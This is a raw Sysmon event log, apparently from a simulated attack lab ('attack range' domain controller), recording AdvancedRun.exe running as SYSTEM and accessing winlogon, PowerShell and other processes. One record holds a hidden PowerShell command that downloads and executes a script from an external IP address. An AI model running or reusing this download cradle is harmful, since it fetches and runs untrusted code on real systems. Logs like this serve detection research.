Windows® Operating SystemMicrosoft CorporationActXPrxy.dllMD5=CA7A58C10B61327C283100DD9277811A,SHA256=13D357E647DB3DFDFE35C56E4CC78244B35647CCA53D34F94F318DA7C848E09FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004080286Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:28.826{834264DD-DAE6-61EA-0D00-000000002702}8761012C:\Windows\system32\svchost.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004080285Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:28.823{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\propsys.dll7.0.14393.4169 (rs1_release.210107-1130)Microsoft Property SystemWindows® SearchMicrosoft Corporationpropsys.dllMD5=21062367FEB4D61857A65449EA516260,SHA256=FA481B495A9FE2E3E78173C9B065E4292911A1CD403D90A03058A54309366D17trueMicrosoft WindowsValidATTACKRANGE\Administrator 154100x80000000000000004079786Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.841{834264DD-14D0-61EB-A008-000000002702}5124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoExit powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://34.218.235.219:80/b'))"C:\Windows\System32\NT AUTHORITY\SYSTEM{834264DD-DAE4-61EA-E703-000000000000}0x3e72SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg -runATTACKRANGE\Administrator 10341000x80000000000000004079785Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.839{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004079784Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.839{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004079783Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.834{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079782Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.834{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-14C8-61EB-9808-000000002702}5860C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079781Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.834{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-14C8-61EB-9708-000000002702}2972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079780Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.833{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132D-61EB-5B08-000000002702}5868C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079779Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.833{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132D-61EB-5A08-000000002702}4608c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079778Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.833{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132A-61EB-5908-000000002702}1164C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079777Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.833{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132A-61EB-5808-000000002702}3136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079776Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.833{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-12C7-61EB-4508-000000002702}2204C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079775Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.833{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C807-000000002702}3452C:\Program Files\OpenJDK\jdk-17.0.1\bin\java.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079774Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.833{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C707-000000002702}2228C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079773Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.833{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C607-000000002702}2224C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079772Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.832{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F905-000000002702}2420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20